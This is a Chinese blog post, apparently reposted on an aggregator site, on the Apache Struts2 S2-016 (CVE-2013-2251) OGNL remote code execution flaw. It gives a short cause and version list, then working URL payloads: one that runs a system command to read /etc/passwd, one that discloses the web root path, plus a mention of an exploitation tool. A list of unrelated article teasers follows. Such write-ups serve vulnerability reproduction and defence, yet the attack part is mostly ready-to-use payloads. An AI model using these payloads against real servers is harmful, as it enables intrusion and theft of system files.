S2-016 远程代码执行漏洞

news/2025/4/1 6:04:29/

在struts2中,DefaultActionMapper类支持以"action:"、“redirect:”、"redirectAction:"作为导航或是重定向前缀,但是这些前缀后面同时可以跟OGNL表达式,由于struts2没有对这些前缀做过滤,导致利用OGNL表达式调用java静态方法执行任意系统命令。

漏洞记录

S2-016
CVE-2013-2251
影响版本:Struts 2.0.0 – Struts 2.3.15
http://struts.apache.org/release/2.3.x/docs/s2-016.html
影响范围非常大

漏洞检测利用

验证:
访问http://192.168.1.15:8080/index.action?redirect:OGNL表达式即可执行OGNL表达式。

http://192.168.1.15:8080/index.action?action:%25{3*4}

执行任意命令EXP

?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passwd'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}

爆网站路径EXP

?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D

k8工具检测利用
在这里插入图片描述
执行命令:
在这里插入图片描述

参考链接:
https://www.freebuf.com/vuls/11220.html
https://github.com/vulhub/vulhub/blob/master/struts2/s2-016/README.zh-cn.md

在这里插入图片描述


http://www.ppmy.cn/news/191818.html

相关文章

openshift s2i 过程详解

openshift s2i 过程详解

1、概念介绍 openshift的s2i过程是把基础镜像和源代码结合,生成可以运行的applanation镜像的过程,先来明确两个概念, 1、builder image 包含编译环境的基础镜像,比如golang:1.8 2、runtime image 编译以后&#xff…
阅读更多...
s2p标准格式

s2p标准格式

目录 s2p文件的格式dB和角度线性幅度和角度虚部和实部 举例:s2p文件导入后报错以及修改从snp文件看数据是否校准 射频电路的仿真与测量都会用到snp文件,比如网络分析仪的测量结果存储会存成snp文件,该文件可以导入到仿真软件中,进…
阅读更多...
Google S2 常用操作

Google S2 常用操作

Google S2常用操作 Google S2包引用经纬度 转 CellIdCellId 转 经纬度S2计算距离经纬度构建任意形状经纬度构建S2矩形经纬度构建S2多边形经纬度构建圆形 任意形状内所有S2块判断点是否在任意形状内S2块包含的S2子块判断当前cellId的level Google S2 包引用 <dependency>…
阅读更多...
16 声音检测算法的封装

16 声音检测算法的封装

概述 在IPC中,有时候需要对声音的大小进行检测。当声音的分贝数超过一定阈值时,一般会联动进行抓图、录像等动作。声音的采集与具体的芯片方案有关,但声音的检测与芯片方案关系不大,我们可以采用软件算法的方式来进行处理。 声音检测接口类 声音检测接口类主要包含以下七个…
阅读更多...
教程:Deepin Linux v20操作系统查看cpu的温度

教程:Deepin Linux v20操作系统查看cpu的温度

我们在使用windows系统时&#xff0c;会在电脑中止安装鲁大师等查看硬件信息的软件&#xff0c;查看一些我们关心的硬件信息&#xff0c;其中cpu温度就是我们比较关心的重要信息之一&#xff0c;在windows系统查看这些信息非常简单&#xff0c;安装相关软件就可以非常方便查看到…
阅读更多...
cpu为何有两个温度?

cpu为何有两个温度?

主板给予的信息而已&#xff0c;一般看封装温度就好。封装温度不超过120度cpu老化速度赶不上你换的速度。&#xff08;前提不去极限超频或者长时间满载运行。 CPU的耐热还是没问题的。一般就算天天100度跑5到6个小时&#xff0c;至少要2到3年时间才能出现cpu算坏&#xff08;除…
阅读更多...
内存cpu占用不高但mysql很卡_为什么cpu占用率不高,内存也不高,电脑会卡

内存cpu占用不高但mysql很卡_为什么cpu占用率不高,内存也不高,电脑会卡

展开全部 1、CPU负荷过大&#xff0c;或者工作不正常。32313133353236313431303231363533e58685e5aeb931333433626435检查CPU和显卡散热&#xff0c;除尘&#xff0c;上油&#xff0c;或更换风扇。 2、电源电压不稳&#xff0c;电源功率不足。更换质量高的功率大的电源。 3、显…
阅读更多...
计算机的cpu故障,电脑CPU四大常见问题:重启、死机、噪音、过热,自己也可以解决...

计算机的cpu故障,电脑CPU四大常见问题:重启、死机、噪音、过热,自己也可以解决...

电脑CPU四大常见问题&#xff1a;重启、死机、噪音、过热&#xff0c;自己也可以解决&#xff01; 大家好&#xff01;欢迎阅读硅谷聊科技原创作品&#xff0c;每天更新最新、最全、最权威的科技资讯&#xff0c;带你领略不一样的科技世界。 CPU中文简称中央处理器&#xff0c;…
阅读更多...
最新文章

Copyright @ 2022~2023